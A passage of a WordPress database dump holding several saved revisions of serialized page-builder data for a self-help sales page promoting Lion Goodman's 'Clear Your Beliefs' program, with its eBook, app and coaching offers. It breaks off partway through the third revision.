(1211, 1688, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:224:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="577" height="140" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:446:"<center style="margin-top: -100px;"><div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:657px; height:370px; padding-top: 8px; margin-top: 118px;">\n<iframe src="//player.vimeo.com/video/109282065?autoplay=1" width="657" height="370" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:647:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -25px; margin-bottom: -30px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p style="text-align: center; margin-top:38px; margin-bottom:0px;">Download the free eBook.</p>\n<center style="margin-top: -5px;">\n<div style="margin-left: -15px; margin-bottom: -12px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/54657fac17ff5d88bb7ea5db95ab4742"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:944:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: 8px; margin-bottom: -27px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-new-FINAL-large-with-font.jpg" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 8px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<div style="margin-left: -12px; margin-bottom: -28px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/95b50364c9028abe58d1cf438ba1ed6c"></script></div>\n\n\n<div style="margin-left: -12px; margin-bottom: -28px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/4d653090e9a0295e74e12ab5dff702ae"></script></div>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:657:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; margin-top: -30px; width: 118%; margin-left: -21px;"><img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x155.jpg"></div>\n<p style="text-align: center; margin-top: 8px; font-size: 18px;"><big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/af866427c80f3c42fbfe2df24442de38"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2813:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li> <em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:8:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}i:7;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:10:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}}}'),
(1212, 1689, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:224:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="577" height="140" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:446:"<center style="margin-top: -100px;"><div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:657px; height:370px; padding-top: 8px; margin-top: 118px;">\n<iframe src="//player.vimeo.com/video/109282065?autoplay=1" width="657" height="370" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:628:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -25px; margin-bottom: -30px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p style="text-align: center; padding-top:10px;">Download the free eBook.</p>\n<center style="margin-top: -20px;">\n<div style="margin-left: -15px; margin-bottom: 0px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/54657fac17ff5d88bb7ea5db95ab4742"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:944:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: 8px; margin-bottom: -27px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-new-FINAL-large-with-font.jpg" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 8px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<div style="margin-left: -12px; margin-bottom: -28px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/95b50364c9028abe58d1cf438ba1ed6c"></script></div>\n\n\n<div style="margin-left: -12px; margin-bottom: -28px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/4d653090e9a0295e74e12ab5dff702ae"></script></div>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:657:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; margin-top: -30px; width: 118%; margin-left: -21px;"><img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x155.jpg"></div>\n<p style="text-align: center; margin-top: 8px; font-size: 18px;"><big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/af866427c80f3c42fbfe2df24442de38"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2813:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li> <em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:8:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}i:7;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:10:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}}}'),
(1213, 1690, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:224:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="577" height="140" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:446:"<center style="margin-top: -100px;"><div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:657px; height:370px; padding-top: 8px; margin-top: 118px;">\n<iframe src="//player.vimeo.com/video/109282065?autoplay=1" width="657" height="370" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:622:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-top: -25px; margin-bottom: -30px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p style="text-align: center; padding-top:10px; margin: 0px;">Download the free eBook.</p>\n<center style="margin-top: -20px;">\n<div style="margin-left: -15px; margin-bottom: 0px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/54657fac17ff5d88bb7ea5db95ab4742"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:944:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: 8px; margin-bottom: -27px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-new-FINAL-large-with-font.jpg" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 8px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<div style="margin-left: -12px; margin-bottom: -28px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/95b50364c9028abe58d1cf438ba1ed6c"></script></div>\n\n\n<div style="margin-left: -12px; margin-bottom: -28px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/4d653090e9a0295e74e12ab5dff702ae"></script></div>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:657:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; margin-top: -30px; width: 118%; margin-left: -21px;"><img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x155.jpg"></div>\n<p style="text-align: center; margin-top: 8px; font-size: 18px;"><big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/af866427c80f3c42fbfe2df24442de38"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2813:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li> <em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion 